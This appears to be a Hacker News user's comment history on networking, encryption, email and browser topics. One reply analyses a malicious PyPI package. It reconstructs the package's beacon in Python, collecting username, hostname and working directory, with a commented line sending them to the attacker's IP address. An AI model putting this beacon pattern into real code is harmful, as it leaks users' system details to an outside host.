b101010 commented on Playing battleships over BGP   blog.benjojo.co.uk/post/b... · Posted by u/benjojo12
xingped · 7 years ago
Does anyone have any recommended resources for learning more about and playing with BGP?
b101010 · 7 years ago
Have a look at dn42.

https://dn42.net/Home

b101010 commented on Malicious software libraries found in PyPI posing as well known libraries   nbu.gov.sk/skcsirt-sa-201... · Posted by u/nariinano
a3n · 8 years ago
Dry run?
b101010 · 8 years ago
The "malicious" code at the end of the advisory looks like nothing more than a beacon announcing it was installed?

  edit:
  get current working directory
  get username
  get hostname
  concatenate the last 3 together
  obfuscate(/encrypt?) this string
  send the result as an HTTP request to 121.42.217.44 (the value of the base64 string)
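Those steps could be sketched roughly like this (a hypothetical reconstruction from the advisory, not the actual sample; the real code also obfuscated the string and decoded the target IP from a base64 literal):

```python
import getpass
import os
import socket

def build_beacon() -> str:
    # cwd + username + hostname, concatenated as the advisory describes
    return os.getcwd() + getpass.getuser() + socket.gethostname()

# The sample then obfuscated/encrypted this string and sent it as an
# HTTP request to 121.42.217.44 (the IP hidden in the base64 string),
# e.g. urlopen("http://121.42.217.44/?" + obfuscate(build_beacon()))
```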

b101010 commented on Build command line apps using PHP 7   github.com/tarsana/comman... · Posted by u/webNeat
carlmr · 8 years ago
Why?
b101010 · 8 years ago
php-cli scripts normally don't have an execution time limit (or a memory limit?), which makes them ideal for upgrades, database maintenance, cron jobs, etc., while still being able to reuse code from the application itself.

One example: https://docs.moodle.org/22/en/Administration_via_command_lin...

b101010 commented on Mozilla’s Send makes it easy to send a file from one person to another   theverge.com/2017/8/2/160... · Posted by u/Tomte
brianberns · 8 years ago
> Mozilla says it “does not have the ability to access the content of your encrypted file.”

This can't possibly be true. Since Mozilla is encrypting the file, they can also decrypt it (and must do so when the recipient downloads it).

Edit: I was wrong, but will leave this comment because the explanation is useful.

b101010 · 8 years ago
The share links look like this

https://send.firefox.com/download/<$file_identifier>/#<$encryption_key>

Data after the # in the URL (the fragment) should not be sent to the HTTP server by the client. Encryption/decryption is presumably handled in the user's browser by JavaScript.

The statement about not having the ability to access the contents of the files is perhaps somewhat misleading, as they do control the JavaScript that either creates the key or is given access to it when someone retrieves the file (by reading it off the end of the URL).
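The split is easy to see with a URL parser; the file identifier and key below are placeholders, not real Send values:

```python
from urllib.parse import urlsplit

# Hypothetical share link in the Send format
url = "https://send.firefox.com/download/abc123/#secret-key"
parts = urlsplit(url)

print(parts.path)      # /download/abc123/  -> part of the HTTP request
print(parts.fragment)  # secret-key         -> stays in the browser
```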

b101010 commented on A security update for the Raspberry Pi   raspberrypi.org/blog/a-se... · Posted by u/alexellisuk
jcriddle4 · 9 years ago
I wonder if instead they could setup a fake or jailed SSH that would let you login, it would then display helpful info about how to really enable SSH and then it would kick you out?
b101010 · 9 years ago
Part of this can be done with OpenSSH by setting the Banner option in sshd_config.

"Banner The contents of the specified file are sent to the remote user before authentication is allowed. If the argument is ``none'' then no banner is displayed. By default, no banner is displayed."

b101010 commented on Orbit – Distributed, serverless, peer-to-peer chat application on IPFS   github.com/haadcode/orbit... · Posted by u/niklasbuschmann
kefka · 9 years ago
Not true.

You share:

1. Files you Pinned (think of as torrent seeding)

2. Files you have in your IPFS cache

     a. Cache files are added to when you request IPFS content
     b. The garbage collection triggers and removes non-pinned content at regular intervals
3. The default files that are added to a new IPFS repo (unless you removed them or init'ed using the appropriate option to not include them)

To answer the GP's question: As long as you don't pin child porn, and you don't look for child porn, there's 0% chance in IPFS-land.

b101010 · 9 years ago
Would (a) not be

  a. Cache files are added to when _something causes a request for_ IPFS content
The distinction being that "something" is not always a direct action from the user.

If content on IPFS (i.e. a web page?) can reference and load content from other addresses (assumption), then could someone end up in the situation where they are "hosting" (from the cache) something they would not expect to be? (until the garbage collection clears it)

If this seems far-fetched, a submission to HN the other day surprised a few people[1] because it made an HTTP request to an adult website to check whether they had an active session (but did not display any content).

[1] https://news.ycombinator.com/item?id=12692389

b101010 commented on Show HN: Your Social Media Fingerprint (maybe NSFW)   robinlinus.github.io/soci... · Posted by u/Capira
zerognowl · 9 years ago
This is why I use 'browser isolation', which is a way to separate different types of surfing activity into different buckets. Currently the best way to do this in Firefox is to create multiple profiles, or in Chrome, you can simply add a different user/persona.

Having one profile, or even an entire dedicated browser just for Twitter/FB ensures the login is not spilled over into other sites. If you're surfing the web heavily, I would recommend spawning a new private window so cookies, and other artefacts are not bleeding into your session.

It sounds like common sense, but many people have cookies and login information persisting for years at a time in their browsing sessions. The Mozilla Firefox team are planning to introduce a feature which makes compartmented surfing sessions a lot more user-friendly by separating sessions into tabs. Currently, the 'profiles' feature of Firefox is not user friendly and requires a bit of tinkering with the filesystem.

b101010 · 9 years ago
For anyone wanting to do this, the profile and no-remote command-line options[1] may be useful if you want to create shortcuts that launch specific profiles.

You might also want to consider using a different theme[2] in each profile, to help avoid mixing them up if you're running multiple instances simultaneously.

My initial use case for this was adding the Let's Encrypt staging certificate authority to the trusted root certificate authorities in a profile used only for testing.

[1] https://developer.mozilla.org/en-US/docs/Mozilla/Command_Lin... [2] https://addons.mozilla.org/en-US/firefox/themes/
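For example (the profile names here are made up; -P with no name opens the profile manager):

```
firefox -P                      # open the profile manager
firefox -P work -no-remote      # launch the "work" profile as its own instance
firefox -P testing -no-remote   # launch a second, independent instance
```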

b101010 commented on Fastmail.com suffering DDOS attack   fastmailstatus.com/servic... · Posted by u/moonlighter
JoshTriplett · 9 years ago
> 1.) Run your own SMTP infrastructure. Setup SPF/DKIM/DMARC. Realize your outbound emails still don't always reach their destination. Also you have to fight inbound SPAM.

And if someone wants to DDoS you, you're a lot more vulnerable than a major provider like Fastmail.

Personally, I use a hybrid solution: I use Gandi's SMTP servers for outbound and inbound mail, but I run my own IMAP server for unlimited storage under my control.

b101010 · 9 years ago
If the attacker has ever seen the headers of a message you sent through Fastmail's SMTP service, they have your public IP (from the Received: header) and can DoS you directly anyway.

They do something similar with their webmail service, but the data is encrypted so it can't be read by a third party.

https://www.fastmail.com/about/reportabuse.html (last paragraph)

EDIT: Fastmail is fairly priced (for me) and I like the features they offer, but I wish they wouldn't do this (or rather, I wish they would do the same for the SMTP service as they do for the webmail service).

b101010 commented on “Should you encrypt or compress first?”   blog.appcanary.com/2016/e... · Posted by u/phillmv
mikeash · 9 years ago
It's pointless. If you sign the encrypted data, then once the signature is verified in the receiver, you know that the decrypted data is also good. Repeating the signature just wastes time and space.
b101010 · 9 years ago
After some thought, the only advantage of signing before and after that I can think of is this: without it, you are left with the (theoretical?) problem of not knowing whether the output from your implementation/version of the decrypt/decompress utility is identical to the sender's input to their implementation, if the sender only signs the compressed/encrypted version.

Of course, if the compression/encryption method has some way of checking the integrity of the output (of equal strength to the signature), then signing first would be completely redundant.

EDIT: so in many scenarios, signing first and last would have no advantage. For example, if you get to decide which implementation will be used by both the sender and the recipient (most package managers?)
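As a toy sketch of that sign → transform → sign-again idea (HMAC and zlib stand in for real signatures and encryption here; the shared key is a placeholder):

```python
import hashlib
import hmac
import zlib

KEY = b"shared-signing-key"  # placeholder; a real scheme would use asymmetric signatures

def sign(data: bytes) -> bytes:
    return hmac.new(KEY, data, hashlib.sha256).digest()

def send(plaintext: bytes):
    inner_sig = sign(plaintext)         # sign the original data first
    payload = zlib.compress(plaintext)  # compress (encryption step omitted)
    outer_sig = sign(payload)           # sign the transformed output too
    return payload, inner_sig, outer_sig

def receive(payload, inner_sig, outer_sig):
    # The outer signature checks the bytes as transmitted...
    assert hmac.compare_digest(sign(payload), outer_sig)
    plaintext = zlib.decompress(payload)
    # ...the inner one checks that our decompressor reproduced the
    # sender's original input, whatever implementation either side used.
    assert hmac.compare_digest(sign(plaintext), inner_sig)
    return plaintext
```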

b101010 commented on “Should you encrypt or compress first?”   blog.appcanary.com/2016/e... · Posted by u/phillmv
vog · 9 years ago
Good catch!

Although the article talks about encrypt+sign versus sign+encrypt, the same argument goes for compress+sign versus sign+compress.

b101010 · 9 years ago
Why is the debate about "compress/encrypt then sign" vs "sign then compress/encrypt"?

Is there a non-obvious problem with sign, then compress/encrypt, then sign again? (overcomplicated or unnecessary?)
